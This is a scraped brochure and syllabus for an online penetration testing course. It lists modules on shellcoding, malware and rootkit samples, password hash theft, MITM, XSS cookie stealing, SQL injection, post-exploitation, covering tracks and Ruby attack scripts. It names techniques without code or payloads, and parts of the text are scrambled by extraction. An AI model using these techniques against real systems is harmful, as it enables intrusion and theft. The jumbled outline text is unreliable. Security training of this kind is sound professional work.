Home
Login
Register
Search
Home
Penetration testing Professional
Penetration testing Professional
March 18, 2018 | Author: AkiNiHandiong | Category:
Regular Expression
,
Ruby (Programming Language)
,
Class (Computer Programming)
,
Hypertext Transfer Protocol
,
Port (Computer Networking)
DOWNLOAD
Share
Report this link
Comments
Description
The World’s Premier OnlinePenetration testing course PTPv3 at a glance: Self-paced, online, flexible access 4500+ interactive slides and 14+ hours of video material Five top level authors Five knowledge domains In depth coverage of every technique Two virtual labs for Network, System and Web application security hands-on sessions Dozens of real world vulnerable networks and websites Reporting skills covered in depth Prepares for eCPPT certification Prepares for real world Penetration testing jobs This training course has been chosen by students in 120 countries in the world and by leading organizations such as: Course home page: http://www.elearnsecurity.com/course/penetration_testing/ System security section will provide you with thorough understanding of x86 Architecture and its weaknesses. - Module 1: Introduction - Module 2: Cryptography and Password Cracking - Module 3: Buffer Overflow Module 4: Shellcoding Module 5: Malware Module 6: Rootkit coding In this module, you will learn basics of C++, ASM and x86 Architecture. Sample source codes of C++ and Assembly language are provided in order to get the student familiar with these languages. Advanced buffer overflow exploitation, shellcoding and rootkit coding will require compilers and assemblers that you will get familiar with in this module. 1. Introduction 1.1. Dev-Cpp 1.1.1. Using Dev-Cpp 1.1.2. C++ Video 1.2. Nasm Assembler 1.2.1. NasmX Assembler Introduction 1.2.2. X86 Stack 1.2.3. PUSH and POP 1.2.4. EBP/ESP functionality 1.3. Immunity Debugger 1.3.1. Sample Driver 1.3.2. Compiling your Driver 1.3.3. Using a Driver 1.3.4. Viewing Driver Output Hera Labs are included in this module Almost all penetration test engagements require the understanding of cryptographic topics. This module will ensure that you are current with the most common cryptographic technologies, algorithms and tools. You will also learn how to perform 2 2. Cryptography & Password Cracking 2.1. Introduction 2.2. Classification 2.3. Cryptographic Hash Function 2.4. Public Key Infrastructure 2.5. PGP 2.6. Secure Shell (SSH) 2.6.1. SSH Tunneling 2.7. Cryptographic attacks 2.8. Security pitfalls in implementing advanced password cracking using the best tools available. A thorough review of the most modern tools used to steal and crack Windows password hashes is provided. Finding and exploiting buffer overflows in real world applications is what you will learn during this incredibly handson module. A hard topic made easy through examples explained step by step starting from the very basics of stack manipulation. Armed with assemblers, compilers and debuggers, the students will learn how to hijack the execution of applications. At the end of the module, the student is exposed to the most modern techniques used to prevent Buffer overflows and the main methods to bypass them. Cryptography Systems 2.9. Windows Passwords 2.9.1. LM and NT hashes 2.9.2. SAM 2.9.3. Stealing hashes – Remote 2.9.4. Stealing hashes – Local 2.9.5. Stealing hashes – Live host 2.9.6. Stealing hashes – Offline 2.9.7. Pass the hash 2.9.8. Cracking the hash 3. Buffer Overflow 3.1. Introduction 3.2. The Stack 3.2.1. X86 Stack Frames Samples 3.3. Buffer Overflows 3.3.1. Gaining control of EIP 3.3.2. Steps to trigger the Overflow 3.4. Finding Buffer Overflows 3.4.1. Fuzzing 3.4.2. Identifying Buffer overflows after a crash 3.5. Exploiting real world Buffer Overflows 3.5.1. 32Bit FTP Client exploitation 3.6. ASLR and DEP 3.6.1. ASLR – Brute forcing 3.6.2. ASLR – NOP Sleds 3.6.3. ASLR – Non randomized memory 3.6.4. DEP Hera Labs are included in this module 3 3. Percentage encoding you will actually create your own 4. Shellcode encoding 4. API Hooking 5. Anti-Virtual machine methods .The art of Shellcoding is made available to anyone through easy to understand samples and real world complex scenarios. 4.7. a Trojan and a Virus. Anti-Debugging methods 5. Finding kernel32.2. Sample Driver Framework code for Kernel privilege escalation Hera Labs are included in this module A thorough and detailed classification of types of malware is the introduction to a module featuring the most advanced and obscure techniques used by modern malwares.2.8. Sleep() Shellcode and assemblers. Hooking SSDT 5.1. Execution of Shellcode 4.6. Resolving references at runtime shellcode. Malware 5.6.3. Null free shellcode A small part of theoretical aspects will 4.2.5.3.8. Sample 2 : OS Independent shellcode Three source code examples are 4. The module is enriched as three malware source codes are dissected and explained: a Keylogger. Techniques used by Malware 5.5.2.1.1. IAT Hooking 5.2.2.1. 4.3. Streams 5.2.5. Setting up Windows for Debugging 4.2.6.2.3.5.3.1. Hooking IRP 5.1.2.6. 4 5.2. Hiding a process 5. Inline Hooking 5.8. Writing Universal Shellcode for Windows Different techniques are shown in 4.4. shellcodes 4.2. Sample 1 : Shellcoding framework shellcode through the use of compilers 4. The Driver Architecture 4. Sample 3 : Privilege escalation explained line by line. Types of Shellcode 4.4. 4.2.3.2. EAT Hooking 5.2. Alphanumeric shellcode introduce the practical examples where 4.3.2.8.7.dll address order to let you create your own 4.2. Shellcoding 4. The logic behind privilege escalation 4.4.5. Classification 5.1.8. 3. Real world Samples 5. Packers 5. Permutation 5.4. A brief classification will introduce you to 3 rootkit source code snippets uncovering the most used techniques used by rootkits.1.2.3.4.2.3.3. this module will cover the basics and the most important aspects of rootkit coding. Rootkits Classification 6.3.2. Polymorphism 5.2. Sample 3 : Virus From the creators of the first Windows 7 BIOS Rootkit.2.11. Alphanumeric shellcode 5. Metamorphism 5. How malware spreads 5. Obfuscation 5.4. Percentage encoding 5.2.2.2. Sample 3 : Hiding Files .11. Registers Exchange 5. You will be able to understand and code a rootkit yourself using the Windows Driver Development Kit and perform advanced covert penetration testing.3.2.1.2.8. Garbage Insertion 5.5.3.2.4.3.10. Sample 2 : Trojan 5.4. Sample 1 : Hiding a process 6. Sample 2 : Controlling File Access 6.11.9.1.1. 5 6. Rootkits 6.11. Null free shellcode 5. Sample 1 : Keylogger 5. Introduction 1.2. Information Gathering 1.3.2. Financial information 1.2.2.2.4.1.7.3. .3.2.2. DNS Enumeration 1.1.Module 3: Enumeration .3. techniques and tools for networked PC and devices.1. Cached information 1.2. Netblocks 1.4. Netblocks & AS’s 1.4. Infrastructure Information gathering will deal with the enumeration of DNS.6. Domains 1. Tools 1. Information Harvesting 1.2.4.4. Alive hosts 1. netblocks and other web assets belonging to the organization.4. Infrastructure information gathering 1.Module 4: Sniffing and MITM attacks .Module 5: Exploitation . OSINT / Search Engines 1.2. Domains.Module 6: Post-exploitation . DNS Enum .2. DNS Enumeration 1.4.2.1. databases and specialized search engines.6.2.Network security section will deal with the security testing methodology. 6 1. esearchy 1.2. Finding government contracts 1. IP’s 1.Module 2: Scanning . A Penetration tester will use the information collected during this phase to map the attack surface and increase his chances to breach the organization in the same way criminals do. sensitive and sometimes secret documents by means of free services.4.4.2.5.1.2.2. Students will learn how to get access to valuable. People search and investigation 1.Module 8: Social Engineering The Information Gathering module is the most important phase of the overall engagement.1.1.6. Partners and third parties 1. theHarvester 1.5. Organization Web Presence 1.1.2.1.Module 7: Anonymity . eLearnSecurity proposes an extremely thorough investigation methodology that takes into account the Business and the Infrastructure of the client.3.1.1. OSINT / Social Media 1.5. Job postings 1. Real world information gathering against eLSFoo 1.Module 1: Information Gathering . 3.3.3. P0f Hera Labs are included in this module As one of the most important steps in the penetration test of a network.2.1.1.5.6. Passive/Active Fingerprinting techniques will also be covered in 2.2.1. open 2. Detecting services 2.5. Detecting Alive hosts and open Ports 2. Fierce 1.5.2.2.5.4. Foca & Shodan Hera Labs are included in this module. Other Tools depth.2.1. ACK scan other network protocols. Hping2 ports and services running on them.4. Connect scan 2.1.7.4.4. Nmap 2. 2.1. Timing completely stealth port scans against a 2.5.3. Fragmentation Through Nmap and Hping2.3.5.5. SuperScan We will then show you how to use the 2.2.1.3. 2.2. Amap 2.1.2.2. UDP scan If you are not a network expert.4.2. 2. Introduction 2. IP scan 2.2.1. Decoys learn how to find zombies to mount 2.1.3.4. DNS Map 1. you will 2.1. Scanning 2. The student is also required to conduct an investigation against a real company 2.2. Idle scan first chapters of this module will 2.2.3.2. Banner grabbing Passive and Active OS fingerprinting 2.2. the 2.2.3.2. 7 .1. UnicornScan 2.1. SYN scan 2. Using source ports target. 2.3.1. NULL / FIN / Xmas introduce you to the basics of TCP and 2.1. Firewall/IDS evasion techniques 2.2.2.5. this module will first teach you the theory behind port scanning and service reconnaissance. Win Enumeration best tools to detect live hosts. 1. Snmpenum 3.3. Snmpset 3.2. What it is 3.Scope of this module is to provide you with the techniques professional penetration testers employ to enumerate resources on target.3.3.2.2.1. Wireshark 4.2. SNMP 3.2.2.3. What sniffing means 4. MAC Flooding 4.3.1.3.3. Enumeration 3. Dsniff 4.3. You will be able to explore.3.4. What is NetBIOS 3. NetBIOS is the subject of the first part of this module: real world examples will be explained to show most important techniques and tools to enumerate remote Windows shares and printers. We will make sure you have enough basics of network theory before we 8 3.2. The student will then be introduced to attacks against the protocols through a number of common tools.2.2.1. NAT 3. NetBIOS commands and tools 3. Tcpdump .3.3. Onesixtyone 4.2. Passive Sniffing 4.2.3.4.4. Active Sniffing 4.1.4.3.1.5.2.3.2.4.2. Basics of ARP 4. How NetBIOS works 3.3.2. NetBIOS 3.2.1. Sniffing is a technique that you will be able to fully grasp in its most practical aspects.2. enumerate and map the remote network and its available services through a number of different Windows and Unix tools.2.6.4.2.2.3.1. MIB. Snmpbrute 3. Studying ARP. ARP Poisoning 4.4.3.3. Tools 4. Sniffing 4. SID2USER / USER2SID 3.2.3. Cracking community strings 3.2.2. How it works (Agents.2. You will also learn how to test for NetBIOS Null Sessions that still affect old Windows versions.1.2.3.4.3. Winfo 3.3.4. OID) 3.3. SNMP commands 3. Sniffing & MITM 4.3. Winfingerprint 3.3.2. how it works and how it can be manipulated to mount sophisticated attacks is made extremely easy to understand. Introduction 3. Snmpwalk 3. SNMP basics will be explained. SNMP Attacks 3.2.2. SSLStrip & Ettercap 5.1. Metasploit advanced use : Remote exploitation The module is video and lab intensive.1.3. Intro to Metasploit 5.3.1. Windows LM/NTLM/NTLMv2 weaknesses 5.3. MIB.3.3. Cracking network services: SSH.4.1. Man in the middle (MITM) attacks 4.4.4. ARP Poisoning for MITM 4. Hera Labs are included in this module 9 .1. Vulnerability Assessment 5. you will be able to mount man in the middle attacks within local networks and over the Internet.5.2.2. FTP… 5. Low Hanging Fruits 5.2.1. Metasploit and SET advanced use : Client Side exploitation againt Windows and Linux 5.3. SMB.3. DHCP Poisoning 4. Man in the middle attacks are one of the most used penetration testing techniques today.3.2. How it works (Agents.3.4.3. RDP. SNMP commands 4. Windows authentication protocols are dissected to demonstrate weaknesses and related attacks from Metasploit. VA & Exploitation 5.3. 4. Windump 4.3. OID) 4. Local to Remote MITM 4.3.7.3.3. The student is then immersed in common exploitation techniques used by today’s Penetration testers. Intercepting SSL traffic 4.2. What they are 4. Telnet. Nessus 5. VNC. This module will teach the student how to master Nessus in order to perform thorough and targeted Vulnerability scans with Nessus.4. MITM in Public Key exchance 4.3. Exploitation 5. to exploit client side and remote vulnerabilities in Workstations and Servers.6.cover actual attack scenarios using the best tools available.1. 1. Harvesting stored credentials Penetration testers must possess the 6.2.1. Pivoting 6.1. Mapping the Internal Network any kind of internal weakness that 6. Migration and Getsystem exploitation techniques.2. Maintaining access to the will be exposed to the cyclic steps of a compromised machine successful Post exploitation phase.4. Privilege escalation networks through advanced Post 6.1. Harvesting documents 6.4. Tor Network 7. Tunneling for Anonymity 7.2.5. Backdoors This is the phase where criminals 6.3.1. Crack / Pass the hash 6. Port scanning internal network This is a video and hands-on intensive 6.3.1. Determining machine role in the and ex-filtrate documents and remote network credentials from the organization.2.2. he 6.3. HTTP Proxies 7.2. Maintaining access and Privilege methodology to conduct thorough escalation Exploitation of remote internal 6.2.1.1. Further Pivoted Exploitation module 6.3.4.1. However there are times when testing the efficiency of the target organization incident response team is within the scope of a Penetration tester’s engagement.1.1.2. RDP / Telnet ensure stable high privileged access to 6.6. Browsing Anonymously 7.1.2. Data Harvesting the remote network in order to steal 6.2. Pass the hash Hera Labs are included in this module Penetration testers rarely need to cover their tracks. 6.2.4. 10 7.3.2. This module will teach techniques to perform your tests while covering your tracks. 6.2.3.5.2. 6.3.3. 6. Introduction to the Methodology have come up with a proven 6.3. Creating SSH Tunnels 7.2.1.5.2. Keylogging not only the perimeter security but also 6. ARP Scanning affects the organization security.4. Privilege Escalation on Win Server 2008 and Windows Once the student is comfortable with 7 most recent exploitation techniques.2.3.1.2. Post Exploitation eLearnSecurity experienced instructors 6. Anonymity 7. Cleaning traces .2. Harvesting web browsers data same skill-set and tools in order to test 6. 5. Samples of Social Engineering attacks 8.3. Pipl 8.6. Spokeo 8.2. What is Social Engineering 8. Phishing 8.1.2.2. Social engineering toolkit (SET) .2.1.3. Types of Social Engineering 8.3. Role of Social Networks in Social Engineering 8.Social engineering module will guide you through the most modern social engineering attack techniques.2.5. Almost one hour of video lessons will teach you everything you need to know to master the most important tool in the field: Social Engineering Toolkit. FBI E-mail 8. Pretexting 8.1. Canadian Lottery 8.2.5. Social Engineering 8.3.1.2.2.4. Baiting 8. Pretexting samples 8. Spokeo or Twitter. Real world attacks will be illustrated by exploiting the potential of social networks such as Facebook. Physical 8.4. 11 8. Module 3: Vulnerability assessment .Module 4: Cross site scripting .2.1.3.1.Module 6: Advanced Web Attacks This module will introduce you to the web application security field and its basic terminology.1.3. you will gather all the skills you need to move to more advanced modules. .3. Tools 1. Same origin policy 1.Module 5: SQL Injection . this lab intensive section will teach the student how to conduct a thorough Penetration test against web applications. Headers 1.Today’s Penetration testers have to master web application attack techniques. Burp Suite If you are already an advanced web application security tester. Sessions 1.1.2. Terminology 1. Introduction to Web Applications 1. you will get introduced to the methodology and tools followed throughout the course.Module 2: Information Gathering . Introduction 1. 1. Practice on Coliseum Labs 12 .1.1.Module 1: Introduction . If you are new to this field. 3. Information Gathering Web application information gathering 2. Fingerprinting Frameworks And so much information on your target Applications that exploiting it will be easy and fun.1.1. 2. Infrastructure 2. Typical HTTP Services At the end of this module. 2.1.6.1.2.2. Gathering Information On Target is a long and complex process. Fingerprinting Custom Applications 2.3.5.1. Fingerprinting Third-Party AddOns 2.1.2. you will have 2.2.5.1.2. DNS queries and zone You will learn the best methodologies transfers to collect and store information about 2.1. WHOIS tools 2. Log And Configuration Files 2.1.2.3.1. Using Nslookup your target web assets. Google Hacking Practice on Coliseum Labs 13 . 2.6.4.5. Enumerating users accounts with Burp Proxy 2.7. Mapping The Attack Surface 2. Webserver Modules 2. Crawling The Website 2. Finding Back Up And Source Code Files 2.1.1.1. IP Addresses And Email Addresses It takes insight and perseverance.5.5. Fingerprinting The Webserver This information will be used at later 2.1.2. Enumerating Resources 2.1. Relevant Information Through Misconfigurations 2. 2.1. Finding Hidden Files 2.3.2.1. Directory Listing 2.6.1. Fingerprinting steps in the exploitation process.2.4.2. Finding Owner.1. 3. you will finally steal session cookies. Vulnerability Assessment 3.2.1.3.5. Vulnerability Assessment 3. The three types of XSS 4.3.1. you will master the two most used open source tools.1.3.1. DOM-based XSS 4. to perform Vulnerability Assessment against web applications.2.3. Finding XSS in PHP code 4. This understanding will help you in the exploitation and remediation process. Reflected XSS 4.2.3. Cookie stealing through XSS 4.5. Practice on Coliseum Labs The most widespread web application vulnerability will be dissected and studied thoroughly. At first. you will master all the techniques to find XSS vulnerabilities through black box testing and within PHP code. XSS. This is a hands-on intensive module. Assessing vulnerabilities with Nessus 3. Later. Real world attacks 4. modify website DOM and perform advanced phishing attacks.2. Creating Nikto Modules At the end of this module.3. you will be provided with theoretical explanation.1.5.1. Browsers and same origin policy 4.2. XSS Exploitation 4. Vulnerability assessment VS Penetration testing 3. Anatomy of a XSS exploitation 4. 14 4. Defacement 4. Nessus and Nikto.2. You will also be capable of customizing Nikto to make it current with the latest vulnerabilities.4. Real world exploitation examples will conclude the module. Basics 4.4. XSS 4.1.2.3.3. Persistent XSS 4. Finding XSS 4. Nikto 3.5.1.1.5.5. This step is absolutely necessary when the remote web server is in the scope of the tests or when the target uses third party web applications. Cross site scripting 4.2.1.1. Advanced phishing attacks .Vulnerability Assessment is the process through which you will uncover all the vulnerabilities in the remote system. Exploiting Error Based SQL Injections 5. Accessing the remote network 5.1.1.1.4.2.1.5. Reading remote file system 5. Tools will be covered in depth and a taxonomy will help the student to pick the right tool according to the environment and scenario he will face in real engagements.4.2. Finding Blind SQL Injections 5.6.1. BSQL Hacker.6. Exploiting Blind SQL Injection 5. SQLmap.2.5. SQL Injection 5.1.3.3. Time Based SQL Injections 5.1.6. 5.1.2.5. How to find SQL injections 5.2. Tools 5. From the explanation of the most basic SQL injection to the most advanced.2. Dangers of a SQL Injection 5. Introduction to SQL Injection 5.Practice on Coliseum Labs This module will contain the most advanced techniques to find and exploit SQL Injections. Exploiting Union SQL Injections 5. Optimized Blind SQL Injections 5.2. Dumping database data 5. You will not be able to just dump remote databases but also get root on the remote machine through advanced SQL Injection techniques.4.4. How to find SQL injections 5. Tools taxonomy This is a video and hands-on intensive module Practice on Coliseum Labs 15 .2. SQL Injection Exploitation 5.1. How SQL Injection works 5. Pangolin 5. Advanced methods will be taught with real world examples and the best tools will be demonstrated on real targets.3. 2.2. Dissecting Ajax API’s Ajax API’s.0 attacks 6.3.3. Introduction applications are the subject of this 6. applications logic 6.5.3. Exposed administrative functions Practice on Coliseum Labs 16 . 6. Web 2. 6.1.5. you will learn how to 6.3.4.1. 6.5.5.4. frameworks and exposed 6.2. Finding CSRF vulnerabilities.0 applications by dissecting 6. File Inclusion Vulnerabilities A working exploit will be created step 6.1. HTTP Session Fixation 6. Local File Inclusion by step to demonstrate a CSRF 6.2.5. They will be covered in 6.5. How Ajax works Last but not least.4. Preventing CSRF 6.3. Preventing Session Fixation Session Fixation and CSRF are often 6.2.1. Exploiting CSRF depth. Defeating httpOnly – XST & Ajax audit web 2. CSRF underestimated and overlooked 6.3.6.5. Session attacks module.2. Advanced Web Attacks Sophisticated attacks against web 6. Reverse engineering Ajax functionalities.1. Remote File Inclusion vulnerability found in a famous CMS.4.2. Interactive calculator 1. Once the student masters the Ruby programming language and its features. Ruby from a file 1. installing gems and much more.Module 5: Ruby Advanced: Pentester prerequisites . the student will see how to install and configure the environment in order to work with Ruby.1.1.2.1. Ruby gems 1.1.1.Module 9: Ruby for Pentesters: Exploitation with Ruby .1.3. Variables and Scope . The student will also learn the basic concept of Ruby such as data types.3.3.1.2.1. Data Types .1. Windows Installation 1. Getting started 1.2.1. Interactive Ruby 1. Other system 1.1.1.3. Installation 1.2.2.1. .Module 10: Ruby for Pentesters: Metasploit In this first module of the Ruby section.1. this section covers topics such as exploit vulnerable application with Ruby as well as creating and editing Metasploit modules.1.Module 1: Ruby Basic: Installation and Fundamentals . Libraries 1.Module 2: Ruby Basic: Control structures .1. Suggestions 1. 17 1.1. Installation and Fundamentals 1.Module 3: Ruby Basic: Methods.2.1. Suggestions 1. Suggestions 1.Module 4: Ruby Advanced: Classes.4.1.4. Once the environment is configured. Power of Ruby 1.Module 6: Ruby for Pentesters: Input / Output .2.1.3.3.2.Ruby for Pentesters and Metasploit section covers Ruby programming techniques from the very basics to advanced and penetration testing topics. Ruby from command line 1. Ruby one liners 1.3.Module 8: Ruby for Pentesters: The Web .2.1. Installation & First Look 1.1.Module 7: Ruby for Pentesters: Network and OS interaction . Modules and Exceptions . using the interpreter.4. the student will learn the very basic concepts of Ruby such as running and writing scripts.1. variables declarations and more.1. Float 1.1. Some useful methods 1.2. Strings 1.7.2.5.2.2. Interpolation 1.2.4.4.4.1.3. Integer 1.3.2.2.5. Multi-dimensional array 1. Numbers 1.2.2.4.2. Ranges & Hashes 1.10. “Here document” notation 1.3.6.2.3. Info about strings 1. Ranges (fundamental) 1. Variables and arrays 1.2.4. Alternative Ruby Quotes 1.2.2.3. String arithmetic 1. 18 .3.3.2.1. Array and Strings 1.1. Deletion 1.2.2.5. Array creation 1. Anticipation 1.3.2. Multi-typed array 1.1.2.1.2.2.2.5.3.4.2.2.4.7. Some useful methods 1.1.2. Comments 1.2. Operations between arrays 1.2.3.2.2. Numeric 1.2.6.2.2.2. Hashes (methods) Downloadable scripts are included in this module.2. Stack 1. Insertions 1.2.11. Ranges (methods) 1. Single or Double quotes? 1.3.4.2.2.2. Ranges and variables 1.1.3. Hashes (fundamental) 1.3. Arrays 1.2.3.1.2.2.9.2.3.3.4.8.1.1.2.4. Accessing array elements 1.2. With the introduction of methods and blocks.3.3. while 2. redo 2.4. a very important topic needs to be covered: the scope. if 2. In this module.1.4. break 2. alias 3.2. unless 2. Variables & Scope 3.1.1. Parentheses 3.6.4. External iterators 2.2. bang methods 3. some consideration 2. In this module.2.1.2.2.3.3. blocks.5. Methods.2. until 2. Methods 3.1. variable length arguments 3. Iterators 2.3.1.1. block arguments 3.4. returned values 3. Variables Types 3.4. Enumerable objects 2. This will allow the student to create scripts and programs that are not limited to a linear sequence of statements. 2.4.4.5. local variables 3.6.1.1.1.5.2. Control Structures 2.1. Altering structured control flow 2. the student will learn how to write and define different types of Ruby control structures.1.3. BEGIN / END Downloadable scripts are included in this module.1.4. case 2.4. for 2.2. Loops 2.5. Conditionals 2. parameters default values 3.1.7. This is useful for creating very powerful tools and scripts. Ternary operator 2.One of the most important program structures that a programmer has to master is the ‘flow control structure’. the student will learn how to define and use Ruby methods.5.2.8.3. Iterators & Enumerators 2.2.3. Conclusion 2.3.2.3.2.1. aliases and more.2. 19 3.4.5. Simple method definitions 3.9.2.1. Enumerator 2.2. Every program must be clean and have reusable structures. next 2. Variables and Scope 3.1. hashes as arguments 3. Comparison operator 2.5. global variables . 5. Along with these topics. Classes principles 4.2. 20 4. Specialize a method 4.3. Simple Rescue 4. RuntimeError 4.1.2.2.3.4.3.3. functions.1.3. Mixin 4.1.5.1.3.1. Namespace and Mixin 4. Mutable/Immutable values 4. With that said.1. private methods 4.5.1. A simple class 4.1.5. namespaces and much more. Modules 4.4.7. Ruby is an Object Oriented Programming language.8.4.1. mixin.1. Rescue 4. Getter/Setter through Metaprogramming 4.5.2.2.2. exceptions are a very useful topic that needs to be mastered in order to take control of the program behavior. an OO program involves classes and objects. In this module. Simple extensions 4.3. protected methods 4.2. Classes.1.1.2.10. Method visibility 4. Operator methods 4. Exception Objects . Other Errors 4.3. we will start covering more advanced topics and we will see how to define and use classes.6.5.4.1. Modules and Exceptions 4.3. Subclassing & Inheritance 4.1.1. modules. Protected methods 4. Constants 4. Raise 4. Constants 4. Class Variables 4.6. Class Methods 4. More about classes 4.5. Private methods 4. CustomError 4.3.3.2.2.1.2.3.1.2. Instance variables 4. Methods overriding 4.9.2.4. A full view 4.2.4.2. Namespace 4.5.5.7. Exception 4.2. Open classes 4.6.1. Instance & Class Variables 3. Constants 3.1.1.2.5.5. Some tricks Downloadable scripts are included in this module.3. we will also see how to handle exceptions.4.1. Instance and Class Variables 4.1. 1.2. Regex is widely used in the security field.3. network communication and so on. More about regexp 5.5.5. Comparisons 5.1.1.1.3.3.2.2. Character classes 5. Time class 5.4.1. Regexp object 5. Create a time instance 5. we will focus on how to use Ruby for penetration testing purposes.1.2.5.1.2.2. create and so on. Anchors 5. Working with string 5.1. it can be used for many different purposes. One of the first topics we will cover is ‘Regular Expression’.1.2.2. delete.4.1.2.3.1.1. Regular expressions 5.4. Type based Exception handling 4.1.1.2.2.1.1.1.6.1. Regular expressions in the Ruby 5.1. Alternatives 5. Repetition 5.1. Global Variables 5.3.3.1.1.3.2.7.3.5.2.1.5. A quick example 5.1.1. retry 4.1.2. Ruby is much more Downloadable scripts are included in this module. Sequences 5. A real world example 5.2. The point 4. From time to string .1.6.3. it is used to find and locate important information stored in files. else 4.2.2.5. 21 5.3.6. Special characters 5.5.1. A good knowledge of how to use and define regex is a ‘must’ for a penetration tester! During the study of this module. Groups 5. Other clause 4. Regexp modifier 5.2.4.6.2.5. Match method 5.1. Basic concepts 5. From this module on.2.1.1. Dates and time 5.1.2.1.5. web pages. Methods. Classes and Modules 4.2. the student will also learn how to use date and time classes as well as manage and interact with files and directories: read. Predicates and conversions 5.1. Arithmetic 5. Conclusion 4.1.4.2.5.4.1.3.2. Ruby is a very powerful programming language and thanks to its many features.6. Pentesters Prerequisites 5.3.1.1. Regular Expressions Syntax 5. ensure 4. Rescue as a statement modifier 4. Components of a time 5.8.2. Normal format 6.2.2. Files 5. filter and store important information.2.4.4.1.3.3. Writing to a file 6.2.1.2.2.3. Grepable format 6. Change Directory 5.3.1. 6.4. Ip extraction 6. Normal format 6.1.2.2.1. All together 6. Reading from a file 6.2.2.2.1.3. Testing Files 5.1. Current Directory 5.5.1.3. Input / Output 6. the student will learn how to use different input and output mechanisms and techniques in order to find (read) or store (write) information to and from files.3.2. XML format 6.2.1. We will see several examples and scripts that can be used in conjunction with other tools (i.2. Example: Windows application directory listing 5.3. Directories 5. Grepable format 6.2.2.1.2.2. Conclusion Downloadable scripts are included in this module 22 . Dir Objects 5. File Stream 6.1.3.2. Other classes 5.3.2.1.6.3.3.4.2.1.1.3.4. Change permission 5.3.1. Directory Listings 5.5. Create/Delete/Rename 5.7.3.1.1.3. Testing Directories 5. Working with names 5.2. Conclusion Downloadable scripts are included in this module In this module.2. Open port extraction 6. Files and Directories 5.2.1.2.2.1.2.3.3. Working with NMAP Files 6.1. nmap) in order to gather.1.e. Creation / Deletion 5. XML format 6. All together 6.3.2. 1.1. In the following module.2. Sockets and blocks 7. Forge a packet (the best way) 7. Connection 7. The Server 7. Execution 7.1. The strategy 7. as well as send and run specific commands).1.2.2. backdoors that are able to retrieve information from remote systems. Net-Ping Gem 7.1.1. Handle the result 7.2.3.3.1.2.1. More about 7.1. The script 7.2.1.1.3.4.3.1.2. Thanks to many useful examples and scripts. A Wireshark view 7. intercept network communications.3.2.3.1.3.1. RFC868 7. Installation 7.1.2. UDP Port scan 7. The script 7. Socket Basics 7.1.1.3. Tcp SYN port scanner 7.1. The script 7.1. Conclusion 7.1.1. Ping sweep 7.2. The Client 7.1.1. the student will learn how to create raw sockets.2.1.3.1. More about 7. UDP behaviour 7.3.1.1. OS interactions .1.Another very important topic that a penetration tester should master is ‘network communication’.1.6.2.3.1. PacketFu 7.1.1.1.2. The script 7. forge packets.1.2.1.1.1.5.1.1.1.1.1.1.2.3.1.2.2.2.1. the student will learn how to use the power of Ruby in order to create.1.2.1.2. TCP Connection Port scan 7.1.1.1.4. This.1. The strategy 7.2. Forge a custom packet 7.4.1.1.1.1.e.1.2.1. UDP client 7.1. A Wireshark view 7. Network and OS Interaction 7. may be useful to create powerful tools (i.2.3.1. TCP client 7. forge. we will also see how to interact with local and remote Operating Systems.1.1. The strategy 7. Usage 7.2.1.1. Handle the result 7.1.1.1.1. Datagram sending/receiving 7.1. in conjunction with the network communication skills.1.2.6. The network 7.1. In this module. RFC868 7.3. Penetration testing activities 7.1.3.1.1.3.1.1.1.4.2.1.2.2.1.3.5.1.1.3. create TCP/UDP scanners and much more.2.3.2. 23 7. Raw Sockets 7.1.2.1. TCP Client/Server service 7.2.3. 2.2. Ruby's alternatives 8. Parameters 8.4.4.2.2.2. the student will study network communications and local interactions with the OS.1.2.7. Starting point 8.1.2.2.3. Status 8.2.2.5.1.2. the student will be also presented with some useful scripts and use cases useful to run attacks against web application or identify vulnerabilities such as XSS. Kernel exec Kernel system Kernel backticks IO popen Open3 popen3 All together Downloadable scripts are included in this module. Url encapsulation 8.2.1.2. Request & Response 8.2. Using simple socket 8.2.2.3. Net::HTTP library 8. Request Headers 8.2.3. The Web 8.2.4.3.2. We will see how to create and intercept HTTP and HTTPS requests and responses. In the previous module.2.2.1.2.6.2.1. URI object 8. Response object types 8. Net::HTTP class and instances 8. 7. URI and parameters 8. HTTP Protocol 8. 7. Dynamic parameters 8.3.3.1.2.2.4.2. Headers 8.6.3. Net::HTTP get_response 8.4. Hera Labs are included in this module.2. 24 8.3.6. Using get Instance method 8.1. GET 8.2.5.2.4.5. HTTPResponse object 8.1.2.2. Along with these topics.2.1. 7.2.2.1. Using Http::Get request object 8.5.2.2.2.2.1.2.2.2.6.2.1.2.2.2.1. 7.2.2.3.2. Body 8.2.2. Net::HTTP instances 8. Using Http::Get request object .2. Using get Instance method 8. as well as how to send/read GET and POST parameters and much more. Net::HTTP get 8.5.1.2.2.2.1.2. 7. Open-uri library 8. Now it is time to focus on Web Applications.2. 5.2.3.4.2. Open method 8. Follow the chain 8.8. Other Verbs 8.2.2.3.4.2.8.3.1.1. Documentation & Tutorials 8.1.2.6.1.1.1. Using Http::Post request object 8.3.1.2. Example: Form extraction 8.3. Data extraction 8.1.9.7.3.2.2.2. HTTPS 8.2.2.3.1.4.3.2.2.1.3. Conclusion 8.2. Example: Post flooding 8.2.2.2. Https Proxies 8.2.2. Using post Instance method 8. Example: Bruteforce login form 8.3.2.2.4.4.2.1.3. Using Http::Post request object 8. Request Headers 8.1.3. Find a UserName 8.2.1.2.2.3.8.2.2.7. Proxies 8.1.2.2. Installation 8. Using a dictionary 8.7.3.3.7.8.3.6.3.3.8.3. Sessions and Cookies 8.2.4. Persistent Connections 8.1.4. Document Parsing 8.4.2.2.2.2.2. Exercises 8.2.1.2.2. OPTIONS 8.2.1.6.3. Identification 8. Others 8.4. Example: Detect XSS Reflected 8. Using Net::HTTP post_form 8. A simple tool 8. Http Proxies 8.2.3.3.2.3.2.4.2.7. Regular Expressions 8.4. Example: email extraction 8. Nokogiri 8. Redirections 8. Using a string generator 8. Working with Open-uri 8.1.2. POST 8. HEAD 8.2.1. Response identification 8.1.2.1. CMS detection 8.3. Hidden files 25 .2.3.2.3.1.7.2.2. Using the interpreter 8.3.1. Request Headers 8. 2.2.2. The service 10.4.2. Architecture 10.3. Preamble 9.4.2.2.3.2.2. Exploitation with Ruby 9.1. Exploitation 9.4.4.ELS Echo Server 10.2.3.3.2.2.2. Write the script 9.3. The service 9. Files and Folders 10. Writing the payload 9. the student will study the Metasploit architecture and the framework.Architecture and Framework 10.3.2.2. Shell on the victim 9. Exploit 9.1. Interfaces .3. the student should have acquired many Ruby programming skills. Subdomain enumeration Downloadable scripts are included in this module. Now that the student has mastered Ruby and its features.1.2.1. The payload 9. A snapshot 10.2.2.1. The full code 9.1.4.2. During the study of previous modules.2.3.2.1.3. In this module.2. Indexing & 